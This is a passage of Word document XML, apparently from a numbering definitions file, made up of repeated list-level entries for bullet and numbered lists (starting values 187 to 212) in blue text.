    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21625">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21626">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21627">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21628">
    <w:lvl>
      <w:start w:val="187"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21629">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21630">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21631">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21632">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21633">
    <w:lvl>
      <w:start w:val="188"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21634">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21635">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21636">
    <w:lvl>
      <w:start w:val="189"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21637">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21638">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21639">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21640">
    <w:lvl>
      <w:start w:val="190"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21641">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21642">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21643">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21644">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21645">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21646">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21647">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21648">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21649">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21650">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21651">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21652">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21653">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21654">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21655">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21656">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21657">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21658">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21659">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21660">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21661">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21662">
    <w:lvl>
      <w:start w:val="191"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21663">
    <w:lvl>
      <w:start w:val="192"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21664">
    <w:lvl>
      <w:start w:val="193"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21665">
    <w:lvl>
      <w:start w:val="194"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21666">
    <w:lvl>
      <w:start w:val="195"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21667">
    <w:lvl>
      <w:start w:val="196"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21668">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21669">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21670">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21671">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21672">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21673">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21674">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21675">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21676">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21677">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21678">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21679">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21680">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21681">
    <w:lvl>
      <w:start w:val="197"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21682">
    <w:lvl>
      <w:start w:val="198"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21683">
    <w:lvl>
      <w:start w:val="199"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21684">
    <w:lvl>
      <w:start w:val="200"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21685">
    <w:lvl>
      <w:start w:val="201"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21686">
    <w:lvl>
      <w:start w:val="202"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21687">
    <w:lvl>
      <w:start w:val="203"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21688">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21689">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21690">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21691">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21692">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21693">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21694">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21695">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21696">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21697">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21698">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21699">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21700">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21701">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21702">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21703">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21704">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21705">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21706">
    <w:lvl>
      <w:start w:val="204"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21707">
    <w:lvl>
      <w:start w:val="205"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21708">
    <w:lvl>
      <w:start w:val="206"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21709">
    <w:lvl>
      <w:start w:val="207"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21710">
    <w:lvl>
      <w:start w:val="208"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21711">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21712">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21713">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21714">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21715">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21716">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21717">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21718">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21719">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21720">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21721">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21722">
    <w:lvl>
      <w:start w:val="209"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21723">
    <w:lvl>
      <w:start w:val="210"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21724">
    <w:lvl>
      <w:start w:val="211"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21725">
    <w:lvl>
      <w:start w:val="212"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21726">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21727">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21728">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21729">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
